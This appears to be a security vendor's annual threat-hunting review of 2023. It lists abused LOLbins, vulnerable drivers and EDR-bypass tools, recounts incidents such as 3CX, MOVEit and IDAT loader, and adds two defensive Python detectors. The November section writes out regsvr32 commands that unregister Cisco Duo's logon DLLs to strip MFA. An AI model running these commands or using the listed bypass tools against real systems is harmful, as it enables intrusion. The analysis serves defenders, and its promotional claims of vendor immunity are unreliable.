Attackers often exfiltrate data to legitimate file sharing platforms so that the traffic blends in with normal use and stays under the radar of organizational security controls. The top 10 file sharing platforms we saw abused by attackers in 2023 were:

1. Mega cloud
2. Telegram
3. Discord
4. Dropbox
5. Pastebin
6. Ghostbin
7. Transfer.sh
8. FileTransfer.io
9. Wetransfer.com
10. Sendspace.com

#### Most Abused LOLbins

[Attackers often force otherwise legitimate applications to do bad things.](https://github.com/LOLBAS-Project/LOLBAS#criteria) Examples include arbitrary code execution, download, upload, execute, credential dumping, and DLL side-loading. All are categorized as LOLbins (Living Off the Land Binaries) by WatchTower threat hunters. Below are the top LOLbins abused in 2023:

PowerShell, cmd, WMI, Wmic, PsExec, Esentutl, Ssh, Curl, Rundll32, Regsvr32.exe, Sc.exe, Msiexec.exe, Msconfig.exe, Certutil.exe, At.exe, wget, Netsh.exe, mshta.exe, Bitsadmin.exe, Msbuild.exe, Cscript.exe, Expand.exe, Reg.exe, dllhost.exe

#### Most Used Cross-Platform Programming Languages for Malware

Attackers' use of cross-platform programming languages to code payloads that target different platforms (Windows, Linux, OSX, ChromeOS) exploded in 2023. The table below lists the threat groups and payload names most seen in 2023.

#### DLL Side-Loading Attacks Remain a Favorite in 2023

According to [MITRE, adversaries may execute their own malicious payloads by side-loading DLLs.](https://attack.mitre.org/techniques/T1574/002/) Similar to DLL Search Order Hijacking, side-loading involves hijacking which DLL a program loads.
Rather than just planting the DLL within the search order of a program and waiting for a user to load the targeted application, adversaries may directly side-load their payloads by planting and invoking a legitimate application that executes their payload(s). WatchTower studied the following groups and malware families in 2023 which used DLL side-loading.

#### Top Vulnerable Drivers Targeted by Attackers

Attackers are known to load vulnerable signed drivers to disable the security controls of endpoints and cause maximum damage. Below are the top driver files and the respective threat groups abusing them, as seen in our 2023 investigations.

|Threat Group/Framework|Driver file|Application Name|
|---|---|---|
|UNC3944|iqvw64.sys|Intel Network Adapter Diagnostic Driver|
|Sliver|mhyprot2.sys|Genshin Impact|
|Blackbyte|rtcore64.sys|Micro-Star MSI AfterBurner|
| |dbutil_2_3.sys|Dell|
|North Korea's APT UNC2970|ene.sys|RGB lighting control|
|APT Earth Longzhi|terminator (zamguard64.sys or zam64.sys)|Zemana Anti-Malware|
|BlackCat Ransomware|Ktgn.sys, zamguard64.sys/zam64.sys|Zemana Anti-Malware|
|Multiple ransomware groups|procexp.sys|Process Explorer|
|Agonizing Serpens|rentdrv2.sys|Rentdrv2 Driver|

#### EDR Bypass Tools and Techniques in 2023

Modern EDR technology is the most effective method to prevent successful malware execution. As a result, attackers frequently attempt to use EDR bypass tools to shut it down and avoid detection while carrying out malicious activities. Often, this leaves victims to identify these mechanisms only after the damage is done. Below are the top 5 EDR bypass tools and techniques WatchTower observed in 2023:

**Critically, SentinelOne employs the most robust tamper protection techniques in the industry and is not susceptible to any of these techniques.**

1. [Mhydeath, EDRSandBlast - Use a vulnerable driver to kill EDR processes.](https://github.com/zer0condition/mhydeath)
2. [Chimera - DLL sideloader.](https://github.com/georgesotiriadis/Chimera)
3. [RealBlindingEDR - Uses vulnerable drivers to remove kernel callbacks.](https://github.com/myzxcg/RealBlindingEDR)
4. [BadRentdrv2 - A vulnerable driver capable of terminating several EDRs and antivirus tools, rendering them ineffective. Works on both x86 and x64 platforms.](https://github.com/keowu/BadRentdrv2/blob/main/README.md)
5. [Mhyprot2DrvControl - A library that uses the mhyprot2 driver, mhyprot2.sys, to enumerate process modules, read/write process memory, and kill processes.](https://github.com/kagurazakasanae/Mhyprot2DrvControl)

Additional user-mode EDR evasion techniques observed in 2023:

- Tartarus - TpAllocInject, used for bypassing user-level hooks.
- Unwinder - Used for call stack spoofing; written in Rust.
- UnhookingPatch - Used for patching NT API stubs at runtime.
- HellsHall - Used for performing indirect syscalls.
- KILLER TOOL - Performs multiple activities, such as unhooking and module stomping, for EDR evasion.
- NTDLLReflection - Loads NTDLL reflectively from a remote server to bypass userland hooks.

SentinelOne Singularity's tamper protection ensures that SentinelOne agents are not impacted by any of the attacks listed above.

#### 2023 Infostealer Ecosystem Overview

[In February 2022, Microsoft announced plans to disable macros by default to stop threat actors from abusing the feature to deliver malware via email attachments.](https://techcrunch.com/2022/07/22/microsoft-office-macros-blocked-default/) Before long, cyber criminals started searching for other ways to deliver their loaders and malware. They adopted OneNote in their campaigns to deliver AsyncRAT, AgentTesla, DoubleBack, NetWire RAT, RedLine, Quasar RAT, XWorm, and Formbook, as far back as March 2023. Some of the file types seen used in these campaigns include .one, .chm, .hta, .js, .vbs, .wsf, .bat and .ps1. In May 2023, researchers spotted a new loader named Pikabot, which shared several similarities with Qakbot loaders.
The FBI announced the takedown of the massive Qakbot botnet through an operation codenamed ["Operation Duckhunt" in late August.](https://youtu.be/mIeUT0QmqfU)

###### 2023 Commodity and Malware Loaders Timeline

(Timeline figure spanning JUL 2022 to DEC 2023, with entries at MAY, JUN, AUG, SEP, OCT and DEC 2023. Late 2022 to early 2023: criminals adopted OneNote as an infection vector.)

Following the Qakbot takedown in August 2023, WatchTower hunters saw a spike in DarkLoader campaigns, and in digitally signed infostealer campaigns that delivered the Parallax RAT, Vidar stealer, ClearFake, RedLine, Enosch, the Lumma infostealer and the Raccoon infostealer in September. Around the same time, we also saw threat actors using the IDAT loader to deliver RedLine, Vidar, Amadey, LummaStealer, Danabot and Raccoon stealer. In mid-December, researchers spotted a small set of Qakbot samples in the wild, notably connecting to C2 infrastructure that used the same JARM fingerprint as earlier Qakbot and Pikabot samples. Other main loaders and malware seen in 2023 that showed no signs of slowing down include IcedID, Ursnif, SolarMarker, SocGholish, and Raspberry Robin.

#### Top Stories from 2023

###### January 2023: IceFire Ransomware Abuses IBM Aspera Faspex Vulnerability

In early 2023, WatchTower saw threat actors deploying new Linux variants of IceFire ransomware during intrusions of enterprise networks. These cyber criminals targeted several organizations in the global media and entertainment sectors. Attackers deployed IceFire by exploiting CVE-2022-47986, a deserialization vulnerability in IBM's Aspera Faspex file sharing software. While IceFire's operators previously only targeted Windows environments, they have expanded their scope to include Linux. This strategic shift is a significant move that aligns them with [other ransomware groups who also target Linux systems.](https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/) According to Shodan, over 150 Aspera Faspex servers are exposed online, primarily in the United States and China.

In a joint Vigilance-WatchTower investigation shown below, the attacker downloads payloads named iFire and Demo from the URL shown via the application's Ruby process, which saves them to execute later.

FIG: Payload Download

FIG: Payload Execution

FIG: Snippet of Reconnaissance Activity

Before establishing a reverse shell, the attacker tries to create a backdoor and install the IceFire ransomware payload. On execution, the threat actor's command establishes the reverse shell by connecting to the IP address 140.82.45.172. Once the reverse shell is established, the attacker can perform reconnaissance activity, as shown in the snippet above, and execute the IceFire payload from the same shell. WatchTower has attached IceFire's ransom note below for reference.

[SentinelOne Singularity detects and mitigates IceFire activity, as shown in the following video demo.](https://www.youtube.com/watch?v=Gs6R-TZ3JIg)

###### February 2023: Multi-Stage macOS Crypto Miner Spreads Via Pirated Software

On 22 February 2023, Apple released an update to XProtect, its built-in YARA-based malware file blocking service. Version 2166 added several new signatures for a threat labeled "Honkbox", a cryptominer characterized by its use of XMRig and the Invisible Internet Project (I2P). WatchTower observed Honkbox delivered through pirated software. The payload is an XMRig miner and uses I2P network tooling for communication. Honkbox has at least three variants and uses multiple components, including some undocumented ones. The malware is distributed through The Pirate Bay. Many samples originate from trojanized versions of Logic Pro.
However, threat actors have abused other popular creative applications, including Adobe Zii, Photoshop, Illustrator, and Ableton Live. When executed, the trojanized application decodes several Base64 blobs. One corresponds to the legitimate video editing application Final Cut Pro; this file is launched and is indistinguishable from the original software to the user. The other blobs are the I2P daemon and the XMRig miner. The images below show the shell script responsible for deploying the payloads.

Watch a demo where the Singularity Platform autonomously mitigates this attack.

###### March 2023: Threat Actors Launch First Double Supply Chain Attack Against 3CX

Since the historic SolarWinds breach in 2020, which impacted thousands of organizations, supply chain attacks have become a major concern due to the catastrophic damage they can cause. [In late March 2023, SentinelOne researchers uncovered a supply chain attack against 3CX,](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068690000102786AAA) a VoIP communication company with over 12 million daily users. During this devastating attack, threat actors trojanized the 3CXDesktopApp to infect thousands of users worldwide. The attack compromised the 3CXDesktopApp's supply chain across both the Windows and macOS installers. When a user installed the application, a trojanized library was side-loaded and connected to a command and control (C2) server. After fingerprinting the environment, researchers observed the library downloading an infostealer payload capable of gathering information on the system, as well as browser data from Google Chrome, Microsoft Edge, Mozilla Firefox, and Brave. In some cases, the threat actors used this backdoor to perform cyber espionage. Researchers would go on to discover that this was the first "double supply chain attack": 3CX's compromise led to a supply chain attack on its customers, while 3CX itself was the victim of an earlier supply chain attack.
###### Windows Attack Overview

The trojanized MSI installer side-loads ffmpeg.dll, which decrypts a payload stored in d3dcompiler_47.dll. The attacker used SigFlip to insert the payload into d3dcompiler_47.dll without breaking the existing Authenticode signature, which is possible because the Authenticode hash excludes the certificate table the payload is written into. The decrypted payload is shellcode responsible for launching the DLL payload (SUDDENICON). SUDDENICON then retrieves C2 URLs steganographically stored in icon files and uses them to download the final IconicStealer payload, which exfiltrates browser data.

(Figure: 3CXDesktopApp.exe -> SUDDENICON shellcode -> Iconic Stealer.)

###### Mac Attack Overview

For Apple Mac environments, the 3CX desktop application loads a dynamic library named libffmpeg.dylib. The malicious code in the dylib resides in an init function, which runs before main. It acts as the downloader for the next-stage payload, named UpdateAgent, which performs reconnaissance, collects information from the host, and sends it to a C2 server. In some cases, researchers observed threat actors using a backdoor capable of collecting system information and executing commands.

(Figure: Electron framework in the 3CX Desktop App -> dylib hijacking of libffmpeg.dylib -> downloads UpdateAgent, the second-stage backdoor payload.)

###### Double Supply Chain Attack

Due to the two linked supply chain attacks involving 3CX, cybersecurity experts believe this attack can be classified as a double supply chain attack. According to researchers from Mandiant, 3CX was impacted by a supply chain attack against Trading Technologies. During this attack, threat actors exploited a backdoor in the firm's X_TRADER software, impacting 3CX and several other victims. The attacker moved laterally and compromised both Windows and macOS environments. Researchers identified several similarities between the X_TRADER and 3CXDesktopApp attacks, including the use of SigLoader, SigFlip and shellcode, as well as the use of an identical RC4 key and the same AES-256 encryption scheme.
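The SigFlip technique mentioned in this section works because Authenticode hashes a PE file with its certificate table (the security data directory) excluded, so bytes appended inside that table after the PKCS#7 blob leave the signature valid. The following added Python example (written for this edit, not code from SentinelOne or from the 3CX analysis) parses a PE header, locates the WIN_CERTIFICATE entry and measures the slack beyond the DER-encoded PKCS#7 structure; more than the 7 bytes of alignment padding, or non-zero padding bytes, is the signal. The PE images it inspects are constructed inline with a stand-in DER blob rather than a real signature, and the single-entry assumption and thresholds are this example's own.

```python
"""Authenticode certificate-table slack check (added example, not from the WatchTower report).

Authenticode's hash excludes the security data directory, so tooling such as SigFlip can append a
payload after the PKCS#7 SignedData blob inside WIN_CERTIFICATE without invalidating the signature.
This walker measures that slack. Assumptions: a single WIN_CERTIFICATE entry, and that anything
beyond 7 bytes of zero alignment padding after the DER SEQUENCE is suspicious.
"""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4


def der_sequence_length(buf: bytes) -> int:
    """Total encoded size (tag + length octets + content) of the DER SEQUENCE at buf[0]."""
    if len(buf) < 2 or buf[0] != 0x30:
        raise ValueError("certificate table does not start with a DER SEQUENCE")
    first = buf[1]
    if first < 0x80:                      # short-form length
        return 2 + first
    n = first & 0x7F                      # long-form: n length octets follow
    return 2 + n + int.from_bytes(buf[2:2 + n], "big")


def authenticode_slack(pe: bytes) -> dict:
    """Locate the certificate table of a PE image and report bytes beyond the PKCS#7 blob."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    opt = e_lfanew + 24                               # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", pe, opt)
    dirs = opt + (112 if magic == 0x20B else 96)      # data directories: PE32+ vs PE32 offset
    sec_off, sec_size = struct.unpack_from("<II", pe, dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    if sec_size == 0:
        return {"signed": False, "slack_bytes": 0, "suspicious": False}
    # WIN_CERTIFICATE: dwLength, wRevision, wCertificateType (0x0002 = PKCS_SIGNED_DATA), bCertificate
    dw_length, _revision, cert_type = struct.unpack_from("<IHH", pe, sec_off)
    blob = pe[sec_off + 8:sec_off + dw_length]
    pkcs7_len = der_sequence_length(blob)
    extra = blob[pkcs7_len:]                          # everything after the PKCS#7 structure
    return {
        "signed": True,
        "cert_type": cert_type,
        "table_size": sec_size,
        "pkcs7_length": pkcs7_len,
        "slack_bytes": len(extra),
        # dwLength is rounded up to a multiple of 8, so up to 7 zero bytes are normal padding.
        "suspicious": len(extra) > 7 or any(extra) or sec_size != dw_length,
    }


def fake_pkcs7(content_len: int = 300) -> bytes:
    """Stand-in for a PKCS#7 SignedData blob: a DER SEQUENCE with a long-form length (constructed)."""
    return b"\x30\x82" + struct.pack(">H", content_len) + b"\xA5" * content_len


def build_pe(cert_blob: bytes, appended: bytes = b"") -> bytes:
    """Constructed minimal PE32+ image whose only content is a certificate table.
    `appended` lands after the PKCS#7 blob inside WIN_CERTIFICATE, the SigFlip hiding spot."""
    opt_size = 112 + 16 * 8                           # PE32+ optional header with 16 data directories
    headers_len = 0x40 + 4 + 20 + opt_size            # DOS header + "PE\0\0" + COFF + optional header
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)             # PE32+ magic
    body = cert_blob + appended
    dw_length = 8 + len(body)
    padded = (dw_length + 7) // 8 * 8
    win_cert = struct.pack("<IHH", padded, 0x0200, 0x0002) + body + b"\0" * (padded - dw_length)
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, headers_len, padded)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + win_cert


if __name__ == "__main__":
    print("clean:   ", authenticode_slack(build_pe(fake_pkcs7())))
    print("sigflip: ", authenticode_slack(build_pe(fake_pkcs7(), appended=b"\xCC" * 64)))
```

Run against a real binary, `authenticode_slack(open(path, "rb").read())` reports the same fields; a signature that still verifies with `signtool` or `Get-AuthenticodeSignature` while `slack_bytes` is large is exactly the condition SigFlip relies on, and the slack region is where to start carving.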
(Figure: 3CX desktop software victims; Electron framework; threat actor; 3CX Desktop App; UpdateAgent, the second-stage payload.)

Similarities between the X_TRADER and 3CXDesktopApp attacks:

**DLL side-loading**
**Use of the SigFlip loader**
**Use of the AES-256 GCM algorithm**
**Use of the same RC4 key**
**Similar C2 URL parameters**

###### April 2023: PaperCut Vulnerability Heavily Targeted the Education Sector

[On 19 April 2023, the print management firm PaperCut disclosed that it had received third-party alerts regarding vulnerability exploitation on unpatched servers.](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219) The Zero Day Initiative has tagged these threats as [ZDI-CAN-19226 (CVE-2023-27351)](https://www.zerodayinitiative.com/advisories/ZDI-23-232/) and [ZDI-CAN-18987 (CVE-2023-27350).](https://www.zerodayinitiative.com/advisories/ZDI-23-233/) Vigilance identified threat actors actively exploiting a PaperCut print server and attempting to drop remote access software on several organizations from recently registered infrastructure. Our researchers noticed and blocked this intrusion attempt in its early stages. However, because SentinelOne blocked the attack so quickly, we have less information about the later stages of the kill chain and the threat actors' objectives. Researchers identified a suspicious PowerShell command originating from an exploited PaperCut MF process, prompting Vigilance and WatchTower to seek additional information. The number of Shodan search query results for PaperCut in HTML on the default 9191 listening port is listed below.
###### May 2023: Chinese APT Targeting Government Officials

[Following a G7 meeting in May 2023 where the leaders of Japan, Australia, Brazil, Canada, Comoros, the Cook Islands, France, Germany, India, Indonesia, Italy, the Republic of Korea, the United Kingdom, the United States of America, Vietnam, and the European Union met to discuss global food security and the risks of famine,](https://www.whitehouse.gov/briefing-room/statements-releases/2023/05/20/hiroshima-action-statement-for-resilient-global-food-security/) WatchTower observed threat actors using this meeting to distribute lure documents disguised as action steps and information from Indonesian government officials. These Rich Text Format (RTF) files exploit CVE-2017-11882. WatchTower hunters matched this file, named "[FINAL] Hiroshima Action Statement for Resilient Global Food Security_trackchanged.docx", to [another document found here.](https://www.ft.dk/samling/20222/almdel/UPN/bilag/89/2713030.pdf)

[CVE-2017-11882 is a 17-year-old memory corruption issue in Microsoft Office (including Office 365).](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882) When exploited successfully, it lets attackers execute remote code in a vulnerable environment. This attacker uses a builder tool named RoyalRoad, which several Chinese APT groups previously used to weaponize Microsoft Office files targeting government officials in 2017. WatchTower saw malicious documents exploiting CVE-2017-11882 throughout 2023.

(Figure: volume of malicious documents exploiting CVE-2017-11882 observed during 2023.)

Targets included the United Kingdom, India, Singapore, and Australia. The email's author claimed to be part of Indonesia's Ministries of Foreign and Economic Affairs. The document attached to this email claims to be a series of action statements from the recent G7 meeting in Hiroshima, Japan, regarding "global food security". The document also specifically refers to security issues surrounding the South China Sea. Chinese APT groups have previously used this sensitive political issue against targets within South Asian governments and government-affiliated entities, as shown in the following screenshots. WatchTower reviewed this malicious document and confirmed that it drops an infostealer that connects back to a C2 server.

###### June 2023: Cl0p Exploits MOVEit Vulnerability Globally

WatchTower hunters identified multiple threat actors exploiting [a critical SQL injection vulnerability](https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023) in the managed file transfer solution [MOVEit Transfer.](https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/) MOVEit Transfer allows enterprises to securely transfer files between business partners and customers using SFTP, SCP, and HTTP-based uploads. An advisory from 31 May 2023 warned that attackers can leverage this SQL injection vulnerability to gain escalated privileges and unauthorized access.

**About 2,620 organizations and 77.2 million people have been impacted by the hacking of file transfer service MOVEit since May, according to Emsisoft.**

WatchTower has observed Cl0p previously targeting the following file transfer vulnerabilities:

- Accellion FTA (CVE-2021-27101, CVE-2021-27102, CVE-2021-27103 (SSRF), and CVE-2021-27104) from late 2020 to early 2021.
- SolarWinds Serv-U (CVE-2021-35211) in late 2021.
- GoAnywhere (CVE-2023-0669) in early 2023.
- The PaperCut vulnerability (CVE-2023-27350 and CVE-2023-27351) in early 2023. For more information, please refer to [our previous flash report coverage here.](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068690000119Py0AAE)
- [The MOVEit vulnerability (CVE-2023-34362) and another RCE vulnerability that security researchers are reviewing.](https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability)
For more information, please refer to our flash reports in the Community portal. All MOVEit Transfer customers must apply the new patches released on 9 June 2023, as advised [here.](https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability) Cl0p is known to specifically target vulnerabilities in file transfer applications. Reports indicate this gang has earned over $75 million from MOVEit extortion attacks. This zero-day vulnerability could allow attackers to escalate privileges and gain access to an environment. The attack impacted organizations in the following sectors:

**Print & Digital Media**, **Transportation & Logistics**, **Building Materials**

Key general statistics from Censys about the different service providers and host locations can be found below. Exposed MOVEit Transfer hosts are located almost exclusively in the United States, with only a few hundred hosts exposed in other countries. A list of vulnerable MOVEit Transfer versions is attached below for reference:

###### July 2023: Spike in Mallox Targeting MS-SQL

In 2023, WatchTower hunters investigated and tracked over seven Mallox intrusions. In these instances, we observed the following kill chain:

1. The threat actor exploits a SQL Server to get a shell.
2. They download additional PowerShell scripts.
3. The PowerShell script downloads an MSI file (PurpleFox).
4. PurpleFox establishes persistence and attempts privilege escalation.

WatchTower observed malicious and obfuscated PowerShell command lines originating from the SQL Server process post-compromise. Next, the threat actor downloads malicious payloads from the remote server. In some cases, WatchTower hunters saw PurpleFox download additional files from a remote C2. Across our multiple Mallox incident investigations, we observed Mallox ransomware operators gaining access to an endpoint that was not managed or protected by SentinelOne, and deploying an encryptor payload. In one instance, we observed PurpleFox dropping multiple malicious payloads into the SQL Server temporary directory: BadPotato, three payloads named SweetPotato, and NtApiDotNet.

FIG: SQL Server Exploitation and Additional File Downloads

FIG: WMIC Commands and PowerShell Execution

For more information, WatchTower customers can refer to our previous flash reports in the Community Portal on the seven incidents where Mallox exploited MS-SQL:

- Mallox Ransomware-as-a-Service Updates
- Mallox Ransomware Distributed Via MS-SQL
- Four Mallox Intrusion Attempts Detected in Late August
- Mallox Ransomware Continues to Abuse MS-SQL Servers

FIG: Quick Mallox Ransomware Attack Breakdown

###### August 2023: Akira Abuses Cisco ASA VPN Vulnerability To Achieve Initial Access

SentinelOne WatchTower was the first threat hunting team to identify and investigate Akira ransomware's exploitation of a Cisco VPN gateway vulnerability (CVE-2023-20269, listed in the vulnerabilities section above). While SentinelOne Singularity autonomously detected and prevented lateral movement attempts, WatchTower hunters quickly discovered the ransomware operators' initial access technique through common traits observed on the Akira leak site, and shared their findings with other researchers. [Cisco fixed the bug and reported on the vulnerability in August 2023.](https://www.bleepingcomputer.com/news/security/akira-ransomware-targets-cisco-vpns-to-breach-organizations/)

###### September 2023: IDAT Loader Delivers Multiple Infostealers

WatchTower hunters observed threat actors rapidly adopting the IDAT malware loader in their campaigns in mid-to-late 2023. [The IDAT loader is programmed to support evasion techniques like process doppelgänging, DLL search order hijacking, and Heaven's Gate.](https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/)
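The loader's name comes from the PNG IDAT chunk in which it hides its payload, which this section goes on to describe. An analyst triaging a downloaded PNG can exploit the format's own rule: the PNG specification requires the concatenated IDAT data to be exactly one zlib stream, so any IDAT bytes the inflater cannot consume, or a CRC that does not match, are a carve-out candidate. The added Python example below (written for this edit, not code from SentinelOne, Rapid7 or the loader's authors) walks the chunk layout, verifies CRCs, inflates the IDAT stream and reports what is left over. The two images it inspects are constructed inline; the "not valid zlib" heuristic is this example's own assumption about how a hijacked IDAT looks, and the leftover bytes would still need the per-sample decryption and decompression the loader applies.

```python
"""PNG chunk walker for triaging IDAT-loader style images (added example, not from the report).

Walks the chunk structure (length, type, data, CRC32) of a PNG, checks each CRC, and verifies
that the IDAT data is a single well-formed zlib stream as the PNG specification requires.
Leftover IDAT bytes that the inflater does not consume are reported as a candidate hidden payload.
Sample images are constructed inline; the heuristic is an assumption of this example.
"""
import struct
import zlib
from typing import Iterator, Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def iter_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes, bool, int]]:
    """Yield (chunk_type, payload, crc_ok, offset) for each chunk up to and including IEND."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        if pos + 12 + length > len(data):
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack_from(">I", data, pos + 8 + length)
        yield ctype, payload, zlib.crc32(ctype + payload) == crc, pos
        pos += 12 + length
        if ctype == b"IEND":
            break


def triage_png(data: bytes) -> dict:
    """Summarise the chunk layout and flag IDAT content that is not one clean zlib stream."""
    idat, idat_chunks, bad_crc, end = b"", 0, [], None
    for ctype, payload, crc_ok, pos in iter_chunks(data):
        if not crc_ok:
            bad_crc.append(pos)
        if ctype == b"IDAT":
            idat += payload
            idat_chunks += 1
        if ctype == b"IEND":
            end = pos + 12
    # Inflate with a Decompress object so bytes after end-of-stream surface as unused_data.
    inflater = zlib.decompressobj()
    try:
        inflater.decompress(idat)
        inflater.flush()
        stream_ok, carved = inflater.eof, inflater.unused_data
    except zlib.error:                      # IDAT is not zlib at all (e.g. ciphertext)
        stream_ok, carved = False, idat
    missing_iend = end is None
    trailing = 0 if missing_iend else len(data) - end
    clean = stream_ok and not carved
    return {
        "idat_chunks": idat_chunks,
        "idat_bytes": len(idat),
        "bad_crc_offsets": bad_crc,
        "idat_is_clean_zlib": clean,
        "carved_bytes": len(carved),        # candidate hidden payload for further analysis
        "bytes_after_iend": trailing,
        "suspicious": (not clean) or bool(bad_crc) or missing_iend or trailing > 0,
    }


def chunk(ctype: bytes, payload: bytes) -> bytes:
    """Encode one PNG chunk with its CRC32 over type and data."""
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))


def build_png(extra_idat: bytes = b"") -> bytes:
    """Constructed 1x1 truecolour PNG; extra_idat, if given, is appended as a further IDAT chunk,
    the way an IDAT-loader image carries its payload (constructed sample, not a real one)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)     # 1x1, 8 bits per sample, RGB
    scanline = b"\x00\xff\x00\x00"                           # filter byte + one red pixel
    png = PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(scanline))
    if extra_idat:
        png += chunk(b"IDAT", extra_idat)
    return png + chunk(b"IEND", b"")


if __name__ == "__main__":
    print("clean image:  ", triage_png(build_png()))
    print("hijacked IDAT:", triage_png(build_png(bytes(range(256)) * 2)))
```

The check also catches the cruder variant in which the whole IDAT stream is replaced: the first inflate call then raises and the full IDAT content is reported as carved. A legitimate encoder never emits IDAT bytes after end-of-stream, so a non-zero `carved_bytes` on an image fetched by a suspicious process is worth a look regardless of which loader produced it.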
Researchers have named this loader after its signature technique, where a threat actor stores the malicious payload in the IDAT chunk of a PNG file. A new heap section is created using malloc, and the PNG data is copied into the heap using WinHttpReadData. The compressed data is decrypted and passed to the RtlDecompressBuffer API. The decompressed data holds the executable it needs to inject the shellcode into, and the DLL.

FIG: PNG Containing Malicious IDAT

FIG: Decompressed Data Containing Shellcode

WatchTower has identified multiple stealers using both IDAT loader variants in their operations. Specifically, WatchTower has identified Vidar and Lumma operators using the first variant, where threat actors use a C2 to download PNG files with a malicious IDAT section. Amadey and Raccoon operators use a second variant that shares similarities. In all cases, Vidar, Lumma, Amadey, StealC, Danabot and Raccoon operators decompress the data and inject shellcode.

###### October 2023: TellYouThePass Exploits Apache ActiveMQ Vulnerability (CVE-2023-46604)

On 27 October 2023, WatchTower hunters observed remote code execution in Apache ActiveMQ being used to target both Windows and Linux endpoints, leading to TellYouThePass ransomware infections from the remote IP 172.245.16.125. TellYouThePass is a ransomware family first sighted in early 2019. Threat actors primarily distribute the malware through phishing emails, malicious attachments, or compromised websites. [These attackers also commonly exploit CVE-2021-44228, the Log4Shell vulnerability, to carry out their attacks.](https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html) TellYouThePass ransomware uses AES-256 and RSA-1024 to encrypt both server and user data.

[WatchTower has observed TellYouThePass ransomware targeting both Windows and Linux environments.](https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-revived-in-linux-windows-log4j-attacks/) Despite differences between the two variants and some uncommon features, the Windows and Linux variants use the same ransom note and file extension, indicating they belong to the same malware family. WatchTower hunters believe threat actors exploited this service using a WSO2 arbitrary file upload vulnerability, [discussed in a report from InfoSecMatter, via the Metasploit framework.](https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/wso2_file_upload_rce) In this case, this allowed threat actors to drop and execute a Linux ransomware variant. For more information, WatchTower customers can refer to our flash report in the Community Portal.

###### November 2023: NoEscape/Avaddon Operators Disable Cisco Duo - Hunting for Patient Records

WatchTower identified the first NoEscape variant in May 2023, and issued a report identifying it as an Avaddon ransomware variant. These attacks spiked in November, when Vigilance DFIR analysts identified threat actors targeting a health organization using multiple Cisco vulnerabilities to achieve initial access. NoEscape used Advanced IP Scanner for reconnaissance. WatchTower observed these threat actors using randomly named executables posing as services, launched from a temp directory within the Windows directory on the operating system partition, for persistence. Attackers used NETMongoose and PsMapExec from GitHub repositories to dump credentials for domain admin users, and then used Rclone for data exfiltration.
###### NoEscape Attackers Look for Hospital Records

WatchTower observed NoEscape operators checking for specific file names related to "death", "accident", "litigation", "died", "died or problem" and "NDA".

**[Why do attackers target hospitals?](https://www.sentinelone.com/blog/healthcare-and-cybersecurity-in-the-time-of-covid-19/)**

- Hospitals' IT infrastructure is big, complex and frequently outdated.
- Healthcare institutes work with a multitude of third party vendors (such as suppliers, service providers, state and federal agencies, universities and NGOs).
- Healthcare organizations frequently have issues with overextended staff and a weak security culture.
- Hospitals and care facilities were forced to implement remote monitoring technologies overnight.
- Hospital services cannot halt, due to the risk to human lives.
- Leaked data creates compliance issues.
- Health records can be used for blackmail and additional attacks.

###### NoEscape Operators Disable Cisco Duo

The threat actors executed the following commands to disable Cisco Duo, a multi-factor authentication (MFA) solution, by unregistering its Windows logon credential provider and credential provider filter DLLs:

```
cmd /c regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll"
cmd /c regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll"
```

Unregistering these two COM servers removes the Duo prompt from interactive and RDP logons, so authentication falls back to password only until the DLLs are re-registered (regsvr32 without /u) or the Duo for Windows Logon installation is repaired. A regsvr32 /u against any credential provider DLL is worth alerting on for that reason.

###### NoEscape Actors Approached by LockBit

[Researchers notified the cybersecurity community that the LockBit ransomware operation is now recruiting affiliates and developers from BlackCat/ALPHV and NoEscape after recent disruptions and exit scams.](https://twitter.com/azalsecurity/status/1734030086183993664) Ransomware affiliate exit scams frequently attract complaints on all major hacking forums. NoEscape appears to be banned on XSS and Exploit at the moment, which will likely lead to the group shutting down and potentially rebranding in the future.
